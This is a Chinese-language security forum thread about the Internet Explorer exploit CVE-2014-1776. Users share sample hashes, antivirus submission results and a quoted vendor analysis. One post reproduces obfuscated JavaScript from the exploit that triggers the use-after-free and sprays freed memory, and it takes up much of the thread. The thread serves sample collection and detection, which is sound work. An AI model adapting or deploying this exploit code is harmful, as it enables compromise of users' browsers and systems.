CVE-2014-1776 (14L, 24L, 34L, 40L 更新)

hx1997

newcenturysun 发表于 2014-5-7 14:13
最新发现了几个MD5 楼主能找到么
BE9C50AEC2027E2601ECE95A9B93AA89
746E6437FB8FDF5F863214C5EF5D1EFC

7E29349FCA402D5B415F30535CE6BFA9 在 40L

newcenturysun

万分感谢 总算凑齐了

lh9916

34楼


40楼过FEP

XywCloud

40L样本已经采集

Dust-;羅錠

hx1997 发表于 2014-5-8 08:48
https://www.virustotal.com/en/file/c4170266c2d23ee570f89803244eaec94b5b56f8ba992c7b89ec8e90bf013d0e/ ...

To Dr.Web

[drweb.com #4717391]

尘梦幽然

        function dword2data(dword) {
          var d = Number(dword).toString(16);
          while (d.length < 8)
            d = '0' + d;
          return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
        }

        var g_arr = [];
        var arrLen = 0x250;
        var m_block;
        var g_mark = 1;

        function fun() {
          var CsEEuo1 = 0;
          for (CsEEuo1 = 0; CsEEuo1 < arrLen; ++CsEEuo1) {
            g_arr[CsEEuo1] = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x64\x69\x76');
          }
          var KzmQtp2 = dword2data(0x4eadc0de);
          var osLECEF3 = 0x18181818;
          while (KzmQtp2["\x6c\x65\x6e\x67\x74\x68"] < 0xd8) {
            if (KzmQtp2["\x6c\x65\x6e\x67\x74\x68"] == (0x5c / 2)) {
              KzmQtp2 += dword2data(osLECEF3 - 0x18 - 0xc);
            } else if (KzmQtp2["\x6c\x65\x6e\x67\x74\x68"] == (0xa0 / 2)) {
              KzmQtp2 += dword2data(osLECEF3 + 0x10);
            } else {
              KzmQtp2 += dword2data(0x41414141);
            }
          }
          m_block = KzmQtp2["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (0xd8 - 2) / 2);
          try {
            this["\x72\x65\x6d\x6f\x76\x65\x4e\x6f\x64\x65"](true);
          } catch (e) {}
          CollectGarbage();
          for (CsEEuo1 = 0; CsEEuo1 < (arrLen / 2); ++CsEEuo1) {
            g_arr[CsEEuo1]["\x74\x69\x74\x6c\x65"] = m_block["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, m_block["\x6c\x65\x6e\x67\x74\x68"]);
          }
          g_mark++;
        }

        var g_tmpBuf;
        var g_mk = 1;

        function oil(np) {
          if (g_mk == 1) {
            g_tmpBuf = np;
            setTimeout('oil("");', 200);
            g_mk++;
          } else {
            eval(g_tmpBuf);
          }
        }

Dust-;羅錠

怎么40楼的回复无威胁呢...

Your submission has been analyzed. This file presents no threat to your system.

又分析错了？

Genes

竟然发现，没有权限下载，好伤心。。

ELOHIM

那个js脚本，是什么威胁？楼主。。

hx1997

ELOHIM 发表于 2014-5-9 11:53
那个js脚本，是什么威胁？楼主。。

http://www.cyphort.com/blog/dig- ... -2014-1776-exploit/

The actual exploiting javascript code, which triggers the vulnerability, is present in the actionscript as an RC4 encrypted string. Subsequently it gets decrypted and sent to the cmmon.js via Flash's external interface. cmmon.js triggers the use-after-free vulnerability by executing an eval statement on the received string. The vulnerability allows to modify the length of a vector object, which would be impossible from within actionscript.